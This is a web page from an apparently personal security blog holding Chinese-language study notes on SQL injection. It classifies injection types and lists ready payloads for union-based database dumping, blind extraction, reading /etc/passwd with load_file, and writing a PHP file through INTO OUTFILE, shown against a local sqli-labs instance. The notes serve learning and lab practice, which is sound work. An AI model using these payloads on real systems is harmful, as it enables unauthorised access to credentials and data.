<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="http://yoursite.com/2020/03/20/SQL%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Xingg&#39;s Blog">
<meta property="og:description" content="SQL注入">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-03-19T17:47:29.000Z">
<meta property="article:modified_time" content="2020-03-22T06:20:57.907Z">
<meta property="article:author" content="Xingg">
<meta property="article:tag" content="vulnhub">
<meta property="article:tag" content="HTB">
<meta property="article:tag" content="kali">
<meta property="article:tag" content="web安全">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/03/20/SQL注入/"/>





  <title>SQL注入 | Xingg's Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Xingg's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/20/SQL%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Xingg">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Xingg's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-20T01:47:29+08:00">
                2020-03-20
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/linux/" itemprop="url" rel="index">
                    <span itemprop="name">linux</span>
                  </a>
                </span>

                
                
                  , 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/linux/%E6%95%B0%E6%8D%AE%E5%BA%93/" itemprop="url" rel="index">
                    <span itemprop="name">数据库</span>
                  </a>
                </span>

                
                
                  , 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index">
                    <span itemprop="name">web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>SQL注入</p>
<a id="more"></a>


<h1 id="SQL注入分类"><a href="#SQL注入分类" class="headerlink" title="SQL注入分类"></a>SQL注入分类</h1><h2 id="1-数字型"><a href="#1-数字型" class="headerlink" title="1. 数字型"></a>1. 数字型</h2><pre><code>验证SQL注入漏洞存在
猜测语句为select * from table where id =8
select * from table where id =8‘ 无法执行
select * from table where id =8 and 1=1 数据请求成功
select * from table where id =8 and 1=2 数据请求失败
以上全部满足 则存在sql注入漏洞</code></pre><h2 id="2-字符型"><a href="#2-字符型" class="headerlink" title="2. 字符型"></a>2. 字符型</h2><pre><code>select * from table where username=’admin‘ and password=’123‘
注入 ’ or1=1 #
&apos; or 1=1 –</code></pre><h2 id="3-报错型"><a href="#3-报错型" class="headerlink" title="3. 报错型"></a>3. 报错型</h2><pre><code>输入特殊字符，如果报错，则存在注入点
select * from table where id =8‘
常用的特殊字符：’ \ ; %00 ) ( # &quot;</code></pre><h2 id="4-盲注"><a href="#4-盲注" class="headerlink" title="4. 盲注"></a>4. 盲注</h2><pre><code>无法通过页面直接返回数据
    a. 布尔型
    后台有正确和错误两种页面，根绝返回的页面判断是否注入成功
    b. 无回显型
    正常查询有结果，注入为true有结果，注入为false没结果
    c. 时间型
    用sleep函数判断查询的true和false</code></pre><h2 id="5-堆叠"><a href="#5-堆叠" class="headerlink" title="5. 堆叠"></a>5. 堆叠</h2><pre><code>分号隔开执行多个sql语句</code></pre><h2 id="6-联合查询union"><a href="#6-联合查询union" class="headerlink" title="6. 联合查询union"></a>6. 联合查询union</h2><pre><code>前后查询的参数数量要一样，可以用order by确定，也可以直接union select 1,1,1,1 
但是注意，这样不会总是成功，严格限制过的数据类型为string的话，数字1不会输出
所以最好用NULL，union select NULL,NULL,NULL </code></pre><h2 id="7-二次注入"><a href="#7-二次注入" class="headerlink" title="7. 二次注入"></a>7. 二次注入</h2><pre><code>写入数据库的时候严格转义，存进了数据库，数据库读数据的时候，造成的注入</code></pre><h2 id="8-宽字节注入"><a href="#8-宽字节注入" class="headerlink" title="8. 宽字节注入"></a>8. 宽字节注入</h2><pre><code>在输入单引号&apos;时，数据库会加上反斜杠\来转义，在gbk编码里用两个字节表示一个汉字，可以利用这个特性使\不生效，注入时输入%df&apos; 在后台变成%df%5c&apos; 其中%df%5c变成一个汉字，单引号生效，又存在注入点了
防范：
将character_set_client设置成binary，数据以二进制传递</code></pre><h2 id="9-HTTP其他内容注入"><a href="#9-HTTP其他内容注入" class="headerlink" title="9. HTTP其他内容注入"></a>9. HTTP其他内容注入</h2><pre><code>除了在get post内容中存在注入，其他存在数据库读写的地方，也可能存在注入，比如cookie x-forward-for</code></pre><h1 id="SQL注入常用利用手段"><a href="#SQL注入常用利用手段" class="headerlink" title="SQL注入常用利用手段"></a>SQL注入常用利用手段</h1><h2 id="1-select-load-file-‘-etc-passwd’-读文件"><a href="#1-select-load-file-‘-etc-passwd’-读文件" class="headerlink" title="1. select load_file(‘/etc/passwd’) 读文件"></a>1. select load_file(‘/etc/passwd’) 读文件</h2><pre><code>.bash_histoty</code></pre><h2 id="2-seletc-‘xxx’-into-outfile-‘shell-php’-写文件"><a href="#2-seletc-‘xxx’-into-outfile-‘shell-php’-写文件" class="headerlink" title="2. seletc ‘xxx’ into outfile ‘shell.php’ 写文件"></a>2. seletc ‘xxx’ into outfile ‘shell.php’ 写文件</h2><pre><code>select &apos;&lt;?php phpinfo(); ?&gt;&apos; into outfile &apos;C:\Windows\tmp\8.php&apos; 
数据库用户要有写权限，知道绝对路径
linux下的默认路径 /var/www/html </code></pre><h2 id="3-联合查询爆库"><a href="#3-联合查询爆库" class="headerlink" title="3. 联合查询爆库"></a>3. 联合查询爆库</h2><pre><code>mysql数据库里有个系统库 information_schema
库里有三个重要的表：schemata  tables  columns
schemata : schema_name
tables: table_schema, table_name
columns: table_name,column_name

    a. 爆破库
    id=-1&apos; union select 1,group_concat(schema_name),3 from information_schema.schemata-- +
    发现目标库security
    b. 爆破表
    id=-1&apos; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&apos;security&apos;--+
    发现目标security库下的users表 
    c. 爆破字段
    id=-1&apos; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&apos;users&apos;-- 
    发现目标security库下的users表 下存在usrname,password字段
    d. 查询字段 http://192.168.31.165/sqlilab/Less-1/?id=-1&apos; union select 1,group_concat(username),3 from security.users-- 
    http://192.168.31.165/sqlilab/Less-1/?id=-1&apos; union select 1,group_concat(password),3 from security.users-- 

    e. 注意在where限制查询条件的时候一定要加引号&apos;，
    f. 如果被限制了每次只能返回一条记录，就用group_concat(password)查询，把多个结果当做一条记录输出到页面，也可以用limit 0,1只输出一条
    g. 如果每次可以显示两个字段，每次不限制记录条数，只用查询3次，
    库+表 select table_schema,table_name from information_schema.tables
    表+字段 select table_name,column_name from information_schema.columns
    字段 select user,password from dvwa.users;</code></pre><h2 id="4-盲注爆库"><a href="#4-盲注爆库" class="headerlink" title="4. 盲注爆库"></a>4. 盲注爆库</h2><pre><code>常用函数
length()
left(a,b) 取a的前b个字母
substring(string, start, length)
mid(string, start, length)
substr(string, start, length) 截取字符串 substr(a,b,c)从第b个开始取c个字符
ascii() ord()返回第一个字符的ascii值

substr((select schema_name from information_schema.schemata limit 0,1),1,1)=&apos;i&apos;
length((select schema_name from information_schema.schemata limit 0,1)=18
其中(select schema_name from information_schema.schemata limit 0,1)的limit 0,1表示查询的结果中，从第0行开始，获取1个
这样就能爆出所有的库，表，字段
使用bp的爆破模块 设key为末尾&apos;i&apos;，事情变得简单了起来</code></pre>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/19/msf%E5%8F%8D%E5%BC%B9shell/" rel="next" title="msf反弹shell">
                <i class="fa fa-chevron-left"></i> msf反弹shell
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/03/22/windows_cmd_dos%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/" rel="prev" title="windows_cmd_dos常用命令">
                windows_cmd_dos常用命令 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Xingg</p>
              <p class="site-description motion-element" itemprop="description">记录一个网安民工日常迷惑操作 xingg051@163.com</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">21</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL注入分类"><span class="nav-text">SQL注入分类</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-数字型"><span class="nav-text">1. 数字型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-字符型"><span class="nav-text">2. 字符型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-报错型"><span class="nav-text">3. 报错型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-盲注"><span class="nav-text">4. 盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-堆叠"><span class="nav-text">5. 堆叠</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-联合查询union"><span class="nav-text">6. 联合查询union</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7-二次注入"><span class="nav-text">7. 二次注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#8-宽字节注入"><span class="nav-text">8. 宽字节注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#9-HTTP其他内容注入"><span class="nav-text">9. HTTP其他内容注入</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL注入常用利用手段"><span class="nav-text">SQL注入常用利用手段</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-select-load-file-‘-etc-passwd’-读文件"><span class="nav-text">1. select load_file(‘&#x2F;etc&#x2F;passwd’) 读文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-seletc-‘xxx’-into-outfile-‘shell-php’-写文件"><span class="nav-text">2. seletc ‘xxx’ into outfile ‘shell.php’ 写文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-联合查询爆库"><span class="nav-text">3. 联合查询爆库</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-盲注爆库"><span class="nav-text">4. 盲注爆库</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Xingg</span>

  
</div>
<!--

  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>

-->



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
